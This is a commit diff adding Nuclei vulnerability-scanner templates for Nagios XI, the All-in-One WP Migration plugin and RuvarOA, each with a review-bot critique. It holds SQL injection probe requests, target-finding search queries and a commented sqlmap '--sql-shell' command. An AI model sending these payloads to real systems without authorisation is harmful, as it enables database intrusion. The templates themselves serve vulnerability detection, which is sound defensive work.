1 parent
a1a3429
commit e6b6301
Showing
6 changed files
with
242 additions
and
1 deletion.
@@ -1 +1 @@ | ||
20241027 | ||
20241028 |
@@ -0,0 +1,77 @@ | ||
id: CVE-2023-40931 | ||
|
||
info: | ||
name: Nagios XI v5.11.0 - SQL Injection | ||
author: ritikchaddha | ||
severity: medium | ||
description: | | ||
A SQL injection vulnerability in Nagios XI from version 5.11.0 up to and including 5.11.1 allows authenticated attackers to execute arbitrary SQL commands via the ID parameter in the POST request to /nagiosxi/admin/banner_message-ajaxhelper.php. | ||
impact: | | ||
Successful exploitation of this vulnerability allows an authenticated attackers to execute arbitrary SQL commands. | ||
remediation: | | ||
Upgrade Nagios XI to a patched version or apply the vendor-supplied patch to mitigate this vulnerability. | ||
reference: | ||
- https://rootsecdev.medium.com/notes-from-the-field-exploiting-nagios-xi-sql-injection-cve-2023-40931-9d5dd6563f8c | ||
- https://nvd.nist.gov/vuln/detail/CVE-2023-40931 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 6.5 | ||
cve-id: CVE-2023-40931 | ||
cwe-id: CWE-89 | ||
epss-score: 0.00208 | ||
epss-percentile: 0.59103 | ||
cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* | ||
metadata: | ||
verified: true | ||
max-request: 3 | ||
vendor: nagios | ||
product: nagios_xi | ||
shodan-query: title:"Nagios XI" | ||
fofa-query: app="nagios-xi" | ||
google-query: intitle:"nagios xi" | ||
tags: cve2023,cve,authenticated,nagiosxi,sqli,nagios | ||
|
||
http: | ||
- raw: | ||
- | | ||
GET /nagiosxi/login.php HTTP/1.1 | ||
Host: {{Hostname}} | ||
- | | ||
POST /nagiosxi/login.php HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
nsp={{nsp}}&pageopt=login&username={{username}}&password={{password}} | ||
- | | ||
POST /nagiosxi/admin/banner_message-ajaxhelper.php HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/x-www-form-urlencoded | ||
action=acknowledge_banner_message&id=* | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- "Failed to acknowledge" | ||
- "SQL Error" | ||
- "right syntax to use near" | ||
condition: and | ||
|
||
- type: status | ||
status: | ||
- 200 | ||
|
||
extractors: | ||
- type: regex | ||
name: nsp | ||
part: body | ||
group: 1 | ||
regex: | ||
- "name=['\"]nsp['\"] value=['\"](.*)['\"]>" | ||
internal: true | ||
|
||
# digest: 4a0a00473045022100eaedc676d34f68f9a9a22fc03718775356d34be1a378b3357b5635b2fe881edf022072000ae329286b87e05098a88d3a135a1458d3cefafbe5ac6196122f41dccddc:922c64590222798bb761d5b6d8e72950 |
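Review bot: The login request in the second raw block depends on `{{username}}` and `{{password}}`, which the template never declares or documents, so a scan without matching `-var` values either aborts on unresolved variables or posts the literal placeholders, and the admin helper in the third request is then hit unauthenticated; either way the result is silence rather than a clear signal that credentials are required. A comment above `http:` such as `# Authenticated check: run with -var username=<user> -var password=<pass>` would save the next operator that debugging round. Note too that the probe is a bare `id=*`, which only breaks SQL syntax, so the `SQL Error` / `right syntax to use near` matchers confirm an unhandled database error on the ID parameter rather than data extraction, and installs that suppress verbose SQL errors will not match. The greedy `(.*)` in the nsp extractor will over-capture if another quoted attribute follows on the same line; `([^'\"]+)` is the safer capture.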
59 changes: 59 additions & 0 deletions
poc/cve/CVE-2024-9162-dcfa27f954fffe01a3cc58b701a4304f.yaml
@@ -0,0 +1,59 @@ | ||
id: CVE-2024-9162-dcfa27f954fffe01a3cc58b701a4304f | ||
|
||
info: | ||
name: > | ||
All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary PHP Code Injection | ||
author: topscoder | ||
severity: low | ||
description: > | ||
The All-in-One WP Migration and Backup plugin for WordPress is vulnerable to arbitrary PHP Code Injection due to missing file type validation during the export in all versions up to, and including, 7.86. This makes it possible for authenticated attackers, with Administrator-level access and above, to create an export file with the .php extension on the affected site's server, adding an arbitrary PHP code to it, which may make remote code execution possible. | ||
reference: | ||
- https://github.com/topscoder/nuclei-wordfence-cve | ||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d97c3379-56c9-4261-9a70-3119ec121a40?source=api-prod | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 7.2 | ||
cve-id: CVE-2024-9162 | ||
metadata: | ||
fofa-query: "wp-content/plugins/all-in-one-wp-migration/" | ||
google-query: inurl:"/wp-content/plugins/all-in-one-wp-migration/" | ||
shodan-query: 'vuln:CVE-2024-9162' | ||
tags: cve,wordpress,wp-plugin,all-in-one-wp-migration,low | ||
|
||
http: | ||
- method: GET | ||
redirects: true | ||
max-redirects: 3 | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt" | ||
|
||
extractors: | ||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
internal: true | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- "all-in-one-wp-migration" | ||
part: body | ||
|
||
- type: dsl | ||
dsl: | ||
- compare_versions(version, '<= 7.86') |
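Review bot: `severity: low` (and the `low` tag) disagrees with the `cvss-score: 7.2` and `PR:H ... C:H/I:H/A:H` vector a few lines above it, which sit in the CVSS High band; either change it to `severity: high` or say in the info block why it was downgraded, since the Administrator+ precondition looks like the intended reason. The check itself is only a fingerprint: it reads `Stable tag` from readme.txt and evaluates `compare_versions(version, '<= 7.86')`, so an installed-but-inactive plugin or a stale readme is reported as vulnerable without any request touching the export path. A sentence in the description such as `Detection is version-based only; no export or code injection is attempted.` would make that clear to whoever triages a hit. The two `version` extractors are identical apart from `internal: true`; if the second exists only to surface the version in output, a single non-internal extractor should serve both the DSL matcher and the report.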
@@ -0,0 +1,42 @@ | ||
id: 2024-105272120 | ||
|
||
info: | ||
name: RuvarOA协同办公平台 WorkPlanAttachDownLoad SQL注入漏洞 | ||
author: k3ppf0r | ||
severity: high | ||
description: | | ||
RuvarOA协同办公平台 WorkPlanAttachDownLoad SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 | ||
reference: | ||
- https://blog.csdn.net/qq_41904294/article/details/138723401 | ||
remediation: | | ||
升级RuvarOA到高版本 | ||
classification: | ||
cve-id: 2024-105272120 | ||
cvss-score: 7.8 | ||
cwe-id: CWE-89 | ||
metadata: | ||
date: 2024-05-11 | ||
version: RuvarOA V6.01 、RuvarOA V12.01 | ||
fofa-query: body="txt_admin_key" | ||
tags: sqli,RuvarOA,leak | ||
|
||
# python sqlmap.py -u "http://xxxx?id=1*" --sql-shell | ||
|
||
|
||
http: | ||
- raw: | ||
- | | ||
@timeout: 10s | ||
GET /WorkPlan/WorkPlanAttachDownLoad.aspx?sys_file_storage_id=1%27%20and%20%28@@version%29%3E0%29-- HTTP/1.1 | ||
Host: {{Hostname}} | ||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33 | ||
Connection: close | ||
|
||
stop-at-first-match: true | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- 'status_code == 200' | ||
condition: and | ||
|
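Review bot: The only matcher is `status_code == 200`, so any host that serves `/WorkPlan/WorkPlanAttachDownLoad.aspx` with a 200 — including a patched one returning an error page or a login redirect target — is reported as SQL-injectable, which makes this template a false-positive generator on every reachable RuvarOA instance. The payload `' and (@@version)>0)--` is the classic error-based version probe, and on a Microsoft SQL Server backend (which the .aspx surface suggests but the page does not prove) the version string surfaces in the conversion error, so matching on that text would turn the check into evidence: `- 'status_code == 200 && contains(body, "Microsoft SQL Server")'` in place of the bare status check, or a separate `type: word` matcher on the same string with `matchers-condition: and`. The `# python sqlmap.py -u "http://xxxx?id=1*"` note names an `id` parameter while the request injects `sys_file_storage_id`; align the comment with the request. `classification.cve-id: 2024-105272120` is not a CVE identifier and `cvss-score: 7.8` has no vector, so either drop those keys or move the internal id to `metadata`.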
59 changes: 59 additions & 0 deletions
poc/wordpress/all-in-one-wp-migration-5e3bb756cdfed072ba6289d58365e320.yaml
@@ -0,0 +1,59 @@ | ||
id: all-in-one-wp-migration-5e3bb756cdfed072ba6289d58365e320 | ||
|
||
info: | ||
name: > | ||
All-in-One WP Migration and Backup <= 7.86 - Authenticated (Administrator+) Arbitrary PHP Code Injection | ||
author: topscoder | ||
severity: low | ||
description: > | ||
reference: | ||
- https://github.com/topscoder/nuclei-wordfence-cve | ||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d97c3379-56c9-4261-9a70-3119ec121a40?source=api-scan | ||
classification: | ||
cvss-metrics: | ||
cvss-score: | ||
cve-id: | ||
metadata: | ||
fofa-query: "wp-content/plugins/all-in-one-wp-migration/" | ||
google-query: inurl:"/wp-content/plugins/all-in-one-wp-migration/" | ||
shodan-query: 'vuln:' | ||
tags: cve,wordpress,wp-plugin,all-in-one-wp-migration,low | ||
|
||
http: | ||
- method: GET | ||
redirects: true | ||
max-redirects: 3 | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt" | ||
|
||
extractors: | ||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
internal: true | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- "all-in-one-wp-migration" | ||
part: body | ||
|
||
- type: dsl | ||
dsl: | ||
- compare_versions(version, '<= 7.86') |
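Review bot: The info block has been stripped of everything that identifies the issue: `description: >` is empty, `cvss-metrics:`, `cvss-score:` and `cve-id:` are bare keys (YAML null), and `shodan-query: 'vuln:'` is a query with no CVE, yet the template is still tagged `cve` and reports `severity: low` for what its own name calls arbitrary PHP code injection. The Wordfence reference carries the same vulnerability id (d97c3379-56c9-4261-9a70-3119ec121a40) as the CVE-2024-9162 template added in this commit, so the fields can be filled from there (`cve-id: CVE-2024-9162`, `cvss-score: 7.2` and its vector) or, if this copy is meant as the CVE-less variant, the `cve` tag and the empty classification keys should be removed so validators and downstream consumers do not see nulls. As with its sibling, the check is version-only (`Stable tag` compared against `<= 7.86`), which the description should state.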